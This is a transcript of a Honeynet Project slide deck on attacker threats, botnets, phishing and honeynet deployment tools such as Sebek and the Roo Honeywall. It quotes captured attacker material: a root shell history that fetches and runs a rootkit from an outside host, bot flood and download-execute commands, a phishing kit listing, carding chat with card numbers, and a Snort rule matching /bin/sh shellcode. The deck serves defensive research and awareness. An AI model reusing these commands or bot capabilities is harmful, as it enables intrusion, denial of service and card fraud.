Transcript Honeynets and The Honeynet Project

Honeynets and
The Honeynet Project
Speaker
2
Purpose
To explain our organization, our value to
you, and our research.
3
Agenda
• The Honeynet Project and Research
Alliance
• The Threat
• How Honeynets Work
• Learning More
4
Honeynet Project
5
Problem
How can we defend against an enemy, when
we don’t even know who the enemy is?
6
Mission Statement
To learn the tools, tactics, and motives
involved in computer and network
attacks, and share the lessons learned.
7
Our Goal
Improve security of Internet at no cost to the
public.
• Awareness: Raise awareness of the threats
that exist.
• Information: For those already aware, we teach
and inform about the threats.
• Research: We give organizations the
capabilities to learn more on their own.
8
Honeynet Project
• Non-profit (501c3) organization with Board of
Directors.
• Funded by sponsors
• Global set of diverse skills and experiences.
• Open Source, share all of our research and findings at
no cost to the public.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have nothing to sell.
9
Honeynet Research Alliance
Starting in 2002, the Alliance is a forum of
organizations around the world actively
researching, sharing and deploying
honeypot technologies.
http://www.honeynet.org/alliance/
10
Alliance Members
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
South Florida Honeynet Project
Georgia Technical Institute
Azusa Pacific University
USMA Honeynet Project
Pakistan Honeynet Project
Paladion Networks Honeynet Project (India)
Internet Systematics Lab Honeynet Project (Greece)
Honeynet.BR (Brazil)
UK Honeynet
French Honeynet Project
Italian Honeynet Project
Portugal Honeynet Project
German Honeynet Project
Spanish Honeynet Project
Singapore Honeynet Project
China Honeynet Project
11
The Threat
12
What we have captured
• The Honeynet Project has captured
primarily external threats that focus on
targets of opportunity.
• Little has yet to be captured on advanced
threats, few honeynets to date have been
designed to capture them.
13
The Threat
• Hundreds of scans a day.
• Fastest time honeypot manually compromised,
15 minutes (worm, under 60 seconds).
• Life expectancies: vulnerable Win32 system is
under three hours, vulnerable Linux system is
three months.
• Primarily cyber-crime, focus on Win32 systems
and their users.
• Attackers can control thousands of systems
(Botnets).
14
The Threat
15
The Motive
• Motives vary, but we are seeing more and
more criminally motivated.
• Several years ago, hackers hacked
computers. Now, criminals hack
computers.
• Fraud, extortion and identity theft have
been around for centuries, the net just
makes it easier.
16
DDoS for Money
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline
for this amount of time”
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not
make money off of it?
J4ck: I know plenty of people that'd pay exorbatent
amounts for packeting
17
The Target
• The mass users.
• Tend to be non-security aware, making
them easy targets.
• Economies of scale (it’s a global target).
18
Interesting Trends
• Attacks often originate from economically
depressed countries (Romania is an
example).
• Attacks shifting from the computer to the
user (computers getting harder to hack).
• Attackers continue to get more
sophisticated.
19
The Tools
• Attacks used to be primarily worms and
autorooters.
• New advances include Botnets and
Phishing.
• Tools are constantly advancing.
20
The Old Days
Jan
Jan
Jan
Jan
Jan
Jan
Jan
Jan
Jan
Jan
Jan
8
8
8
8
8
8
8
8
8
8
8
18:48:12
18:48:31
18:48:45
18:48:59
18:49:01
18:49:03
18:49:06
18:49:13
18:51:07
18:51:43
18:52:00
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
HISTORY:
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
PID=1246
UID=0
UID=0
UID=0
UID=0
UID=0
UID=0
UID=0
UID=0
UID=0
UID=0
UID=0
lynx www.becys.org/LUCKROOT.TAR
y
tar -xvfz LUCKROOT.TAR
tar -xzvf Lu
tar -xzvf L
tar -xzvf LUCKROOT.TAR
cd luckroot
./luckgo 216 210
./luckgo 200 120
./luckgo 64 120
./luckgo 216 200
21
Botnets
• Large networks of hacked systems.
• Often thousands, if not tens of thousands,
of hacked systems under the control of a
single user.
• Automated commands used to control the
‘zombies’.
22
How They Work
• After successful exploitation, a bot uses TFTP,
FTP, or HTTP to download itself to the
compromised host.
• The binary is started, and connects to the hardcoded master IRC server.
• Often a dynamic DNS name is provided rather
than a hard coded IP address, so the bot can be
easily relocated.
• Using a special crafted nickname like
USA|743634 the bot joins the master's channel,
sometimes using a password to keep strangers
out of the channel
23
80% of traffic
•
•
•
•
Port 445/TCP
Port 139/TCP
Port 135/TCP
Port 137/UDP
• Infected systems most often WinXP-SP1
and Win2000
24
Bots
ddos.synflood [host] [time] [delay] [port]
starts an SYN flood
ddos.httpflood [url] [number] [referrer] [recursive = true||false]
starts a HTTP flood
scan.listnetranges
list scanned netranges
scan.start
starts all enabled scanners
scan.stop
stops all scanners
http.download
download a file via HTTP
http.execute
updates the bot via the given HTTP URL
http.update
executes a file from a given HTTP URL
cvar.set spam_aol_channel [channel]
AOL Spam - Channel name
cvar.set spam_aol_enabled [1/0]
AOL Spam - Enabled?
25
Numbers
• Over a 4 months period
• More then 100 Botnets were tracked
• One channel had over 200,000 IP
addresses.
• One computer was compromised by 16
Bots.
• Estimate over 1 millions systems
compromised.
26
Botnet Economy
• Botnets sold or for rent.
• Saw Botnets being stolen from each other.
• Observed harvesting of information from
all compromised machines. For example,
the operator of the botnet can request a
list of CD-keys (e.g. for Windows or
games) from all bots. These CD-keys can
be sold or used for other purposes since
they are considered valuable information.
27
Phishing
• Social engineer victims to give up valuable
information (login, password, credit card number,
etc).
• Easier to hack the user then the computers.
• Need attacks against instant messaging.
http://www.antiphishing.org
28
The Sting
29
Getting the Info
30
Infrastructure
• Attackers build network of thousands of
hacked systems (often botnets).
• Upload pre-made pkgs for Phishing.
• Use platforms for sending out spoofed
email.
• Use platforms for false websites.
31
A Phishing Rootkit
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
-rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r-drwxr-xr-x
-rw-r--r--rw-r--r--
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
2
1
1
free
free
free
free
free
free
free
free
free
free
free
free
free
free
free
free
free
free
free
free
web
web
web
web
web
web
web
web
web
web
web
web
web
web
web
web
web
web
web
web
14834 Jun 17 13:16 ebay only
247127 Jun 14 19:58 emailer2.zip
7517 Jun 11 11:53 html1.zip
10383 Jul 3 19:07 index.html
413 Jul 18 22:09 index.zip
246920 Jun 14 20:38 massmail.tgz
8192 Jun 12 07:18 massmail.zip
12163 Jun 9 01:31 send.php
2094 Jun 20 11:49 sendspamAOL1.tgz
2173 Jun 14 22:58 sendspamBUN1.tgz
2783 Jun 15 00:21 sendspamBUNzip1.zip
2096 Jun 16 18:46 sendspamNEW1.tgz
1574 Jul 11 01:08 sendbank1.tgz
2238 Jul 18 23:07 sendbankNEW.tgz
83862 Jun 9 09:56 spamz.zip
36441 Jul 18 00:52 usNEW.zip
36065 Jul 11 17:04 bank1.tgz
49 Jul 16 12:26 banka
301939 Jun 8 13:17 www1.tar.gz
327380 Jun 7 16:24 www1.zip
32
Credit Cards Exchanging
04:55:16 COCO_JAA: !cc
04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box
126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All
This ccs update everyday From My Hacked shopping Database - You must
regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
04:55:42 COCO_JAA: !cclimit 4407070000588951
04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard
(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS
Chk_bot FoR #channel)
04:56:55 COCO_JAA: !cardablesite
04:57:22 COCO_JAA: !cardable electronics
04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :
*** 9(11 TraDecS Chk_bot FoR #goldcard9)
04:58:09 COCO_JAA: !cclimit 4234294391131136
04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :
9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
33
The Future
• Hacking is profitable and difficult to get
caught.
• Expect more attacks to focus on the end
user or the client.
• Expect things to get worse, bad guys
adapt faster.
34
Honeynets
35
Honeypots
• A honeypot is an information system resource
whose value lies in unauthorized or illicit use of
that resource.
• Has no production value, anything going to or from
a honeypot is likely a probe, attack or compromise.
• Primary value to most organizations is information.
36
Advantages
•
•
•
•
•
Collect small data sets of high value.
Reduce false positives
Catch new attacks, false negatives
Work in encrypted or IPv6 environments
Simple concept requiring minimal resources.
37
Disadvantages
• Limited field of view (microscope)
• Risk (mainly high-interaction honeypots)
38
Types
• Low-interaction
• Emulates services, applications, and OS’s.
• Low risk and easy to deploy/maintain, but
capture limited information.
• High-interaction
• Real services, applications, and OS’s
• Capture extensive information, but high
risk and time intensive to maintain.
39
Examples of Honeypots
Low Interaction
•
•
•
•
BackOfficer Friendly
KFSensor
Honeyd
Honeynets
High Interaction
40
Honeynets
• High-interaction honeypot designed to capture
in-depth information.
• Information has different value to different
organizations.
• Its an architecture you populate with live
systems, not a product or software.
• Any traffic entering or leaving is suspect.
41
How it works
A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.
• Data Control
• Data Capture
• Data Analysis
http://www.honeynet.org/papers/honeynet/
42
Honeynet Architecture
43
Data Control
• Mitigate risk of honeynet being used to
harm non-honeynet systems.
• Count outbound connections.
• IPS (Snort-Inline)
• Bandwidth Throttling*
44
No Data Control
45
Data Control
46
Snort-Inline
alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named";flags: A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";
alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named";flags: A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";
replace:"|0000 E8D7 FFFFFF|/ben/sh";)
47
Data Capture
• Capture all activity at a variety of levels.
• Network activity.
• Application activity.
• System activity.
48
Sebek
• Hidden kernel module that captures all
host activity
• Dumps activity to the network.
• Attacker cannot sniff any traffic based on
magic number and dst port.
49
Sebek Architecture
50
Honeywall CDROM
• Attempt to combine all requirements of a
Honeywall onto a single, bootable
CDROM.
• May, 2003 - Released Eeyore
• May, 2005 - Released Roo
51
Eeyore Problems
• OS too minimized, almost crippled. Could
not easily add functionality.
• Difficult to modify since LiveCD.
• Limited distributed capabilities
• No GUI administration
• No Data Analysis
• No international or SCSI support
52
Roo Honeywall CDROM
• Based on Fedora Core 3
• Vastly improved hardware and
international support.
• Automated, headless installation
• New Walleye interface for web based
administration and data analysis.
• Automated system updating.
53
Installation
• Just insert CDROM and boot, it installs to
local hard drive.
• After it reboots for the first time, it runs a
hardening script based on NIST and CIS
security standards.
• Following installation, you get a command
prompt and system is ready to configure.
54
First Boot
55
Install
56
Configure
57
3 Methods to Maintain
• Command Line Interface
• Dialog Interface
• Web GUI (Walleye)
58
Command Line Interface
• Local or SSH access only.
• Use the utility hwctl to modify
configurations and restart services.
# hwctl HwTCPRATE=30
59
Dialog Menu
60
Data Administration
61
Data Analysis
• Most critical part, the purpose of a
honeynet is to gather information and
learn.
• Need a method to analyze all the different
elements of information.
• Walleye is the new solution, comes with
the CDROM.
62
Walleye
63
Data Analysis
64
Data Analysis Flows
65
Data Analysis Details
66
Processes
67
Files
68
Distributed Capabilities
69
Issues
• Require extensive resources to properly
maintain.
• Detection and anti-honeynet technologies
have been introduced.
• Can be used to attack or harm other nonHoneynet systems.
• Privacy can be a potential issue.
70
Legal Contact for .mil / .gov
Department of Justice; Computer Crime and
Intellectual Property Section.
• Paul Ohm
• Number: (202) 514.1026
• E-Mail: [email protected]
71
Learning More
72
Our Website
• Know Your Enemy papers.
• Scan of the Month Challenges
• Latest Tools and Technologies
http://www.honeynet.org/
73
Our Book
http://www.honeynet.org/book
74
Sponsoring
Advanced Network Management Lab
YOU?
75
How to Sponsor
• Sponsor development of a new tool
• Sponsor authorship of a new research
paper.
• Sponsor research and development.
• Buy our book
<[email protected]>
http://www.honeynet.org/funds/
76
Conclusion
The Honeynet Project is a non-profit, research
organization improving the security of the
Internet at no cost to the public by providing
tools and information on cyber security threats.
77
http://www.honeynet.org
<[email protected]>
78